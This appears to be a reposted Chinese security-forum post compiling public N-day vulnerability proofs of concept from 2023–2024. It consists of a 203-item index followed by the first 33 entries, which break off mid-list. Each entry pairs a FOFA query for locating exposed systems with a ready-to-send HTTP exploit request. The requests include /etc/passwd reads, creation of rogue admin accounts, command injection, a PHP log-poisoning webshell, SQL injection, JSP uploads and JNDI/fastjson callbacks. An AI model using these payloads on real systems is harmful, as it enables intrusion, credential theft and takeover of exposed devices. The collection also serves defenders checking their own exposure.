Public Internet Vulnerability Compilation 2023-09 to 2024-06 (reposted)

[复制链接]
跳转到指定楼层
楼主
Posted on 2024-6-5 14:31:29
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界
Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises. We hope this article is of some help to defenders, who can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.


Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is already the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).



Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT management platform arbitrary file read
21. 大华ICC intelligent IoT management platform random remote code execution
22. 大华ICC intelligent IoT management platform log4j remote code execution
23. 大华ICC intelligent IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service washing machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS media management system dmku SQL injection
201. 方正 omni-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of the password you choose.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double-URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request; the injected code executes a function on the base64-decoded value of a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor



Send the following request to the test target; it runs the id command. The request-header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:1000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
        }""
}


22. 大华ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
    "loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
